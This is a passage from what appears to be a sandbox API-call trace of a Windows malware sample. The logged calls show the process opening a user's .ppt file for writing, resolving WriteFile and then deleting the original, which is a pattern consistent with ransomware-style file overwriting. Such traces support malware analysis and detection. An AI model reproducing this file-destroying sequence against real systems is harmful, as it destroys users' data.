lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8bbdb0e0, ftCreationTime.dwHighDateTime=0x1d5c475, ftLastAccessTime.dwLowDateTime=0x8e00b970, ftLastAccessTime.dwHighDateTime=0x1d5bb69, ftLastWriteTime.dwLowDateTime=0x8e00b970, ftLastWriteTime.dwHighDateTime=0x1d5bb69, nFileSizeHigh=0x0, nFileSizeLow=0x13eda, dwReserved0=0x0, dwReserved1=0x777648, cFileName="Vp6FryQ8WD7hsRBCHZV.ppt", cAlternateFileName="VP6FRY~1.PPT")) returned 0x7c2240 [0035.269] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0035.269] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.269] CharLowerBuffW (in: lpsz="byte[81626]", cchLength=0xb | out: lpsz="byte[81626]") returned 0xb [0035.270] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.270] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0035.270] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.270] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0035.270] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0035.270] FreeLibrary (hLibModule=0x76b40000) returned 1 [0035.270] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.270] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.270] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.270] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0035.270] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.270] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.270] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.270] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.270] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.270] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.270] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.271] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.271] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.271] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.271] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.271] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.271] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.271] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.271] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.271] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.271] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0035.271] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0035.271] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\Vp6FryQ8WD7hsRBCHZV.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\jhneqt\\pro_og0zrj3k\\vp6fryq8wd7hsrbchzv.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x128 [0035.271] FreeLibrary (hLibModule=0x76e10000) returned 1 [0035.271] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.271] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.271] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.271] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0035.272] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.274] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0035.274] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0035.275] FreeLibrary (hLibModule=0x76e10000) returned 1 [0035.275] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.275] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.275] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.275] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.275] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0035.275] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.275] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0035.275] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0035.275] FreeLibrary (hLibModule=0x76e10000) returned 1 [0035.275] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.275] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.275] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.276] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\Vp6FryQ8WD7hsRBCHZV.ppt", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\Vp6FryQ8WD7hsRBCHZV.ppt", lpFilePart=0x0) returned 0x6f [0035.276] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0035.276] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\Vp6FryQ8WD7hsRBCHZV.ppt", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8bbdb0e0, ftCreationTime.dwHighDateTime=0x1d5c475, ftLastAccessTime.dwLowDateTime=0x8e00b970, ftLastAccessTime.dwHighDateTime=0x1d5bb69, ftLastWriteTime.dwLowDateTime=0x14bb0960, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x13eda, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="Vp6FryQ8WD7hsRBCHZV.ppt", cAlternateFileName="VP6FRY~1.PPT")) returned 0x7c2240 [0035.276] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\Vp6FryQ8WD7hsRBCHZV.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\jhneqt\\pro_og0zrj3k\\vp6fryq8wd7hsrbchzv.ppt")) returned 1 [0035.278] FindNextFileW (in: hFindFile=0x7c2240, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8bbdb0e0, ftCreationTime.dwHighDateTime=0x1d5c475, ftLastAccessTime.dwLowDateTime=0x8e00b970, ftLastAccessTime.dwHighDateTime=0x1d5bb69, ftLastWriteTime.dwLowDateTime=0x14bb0960, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x13eda, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="Vp6FryQ8WD7hsRBCHZV.ppt", cAlternateFileName="VP6FRY~1.PPT")) returned 0 [0035.278] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0035.278] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5758 | out: hHeap=0x770000) returned 1 [0035.278] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0035.278] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0035.278] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0035.278] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c50e0 | out: hHeap=0x770000) returned 1 [0035.278] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0035.278] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0035.278] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0035.278] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1968 | out: hHeap=0x770000) returned 1 [0035.278] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.278] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0035.278] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0035.278] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0035.278] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0035.278] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a08 | out: hHeap=0x770000) returned 1 [0035.278] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0035.278] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0035.278] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0035.279] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a58 | out: hHeap=0x770000) returned 1 [0035.279] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0035.279] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0035.279] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0035.279] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c10 | out: hHeap=0x770000) returned 1 [0035.279] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0035.279] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0035.279] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ac320 | out: hHeap=0x770000) returned 1 [0035.279] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0035.279] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x935008 | out: hHeap=0x770000) returned 1 [0035.279] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0035.279] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0035.279] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0035.279] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0035.279] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b98 | out: hHeap=0x770000) returned 1 [0035.279] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0035.279] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0035.279] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1800 | out: hHeap=0x770000) returned 1 [0035.279] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0035.279] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18c8 | out: hHeap=0x770000) returned 1 [0035.279] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0035.279] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0035.279] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c60 | out: hHeap=0x770000) returned 1 [0035.279] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0035.279] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0035.279] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0035.279] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0035.279] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0035.279] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0035.279] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0035.279] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0035.280] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0035.280] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0035.280] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0035.280] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0035.280] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0035.280] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0035.280] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0035.280] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0035.280] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0035.280] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0035.280] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0035.280] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0035.280] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b45c8 [0035.280] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0035.280] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0035.280] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0035.280] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c60 [0035.280] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af478 [0035.280] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18c8 [0035.280] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0035.280] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0035.280] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0035.280] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0035.280] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cb80 [0035.280] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1800 [0035.280] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0035.280] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0035.280] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0035.280] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b98 [0035.280] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0035.281] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0035.281] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0035.281] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0035.281] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c10 [0035.281] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0035.281] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0035.281] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0035.281] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a58 [0035.281] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0035.281] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0035.281] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0035.281] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0035.281] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a08 [0035.281] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0035.281] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0035.281] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0035.281] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0035.281] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0035.281] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0035.281] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0035.281] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0035.281] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0035.281] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0035.281] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0035.281] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0035.281] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0035.281] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0035.281] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0035.281] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0035.282] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0035.282] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pt", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0035.282] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ppt", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0035.282] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ppt", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0035.282] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0035.282] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0035.282] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0035.282] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0035.282] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0035.282] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0035.282] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a08 | out: hHeap=0x770000) returned 1 [0035.282] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0035.282] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0035.282] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0035.282] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0035.282] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0035.282] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0035.282] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0035.282] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a08 [0035.282] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0035.282] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0035.282] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0035.282] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1968 [0035.282] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0035.282] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0035.282] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0035.282] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0035.282] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0035.282] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0035.282] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0035.282] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, 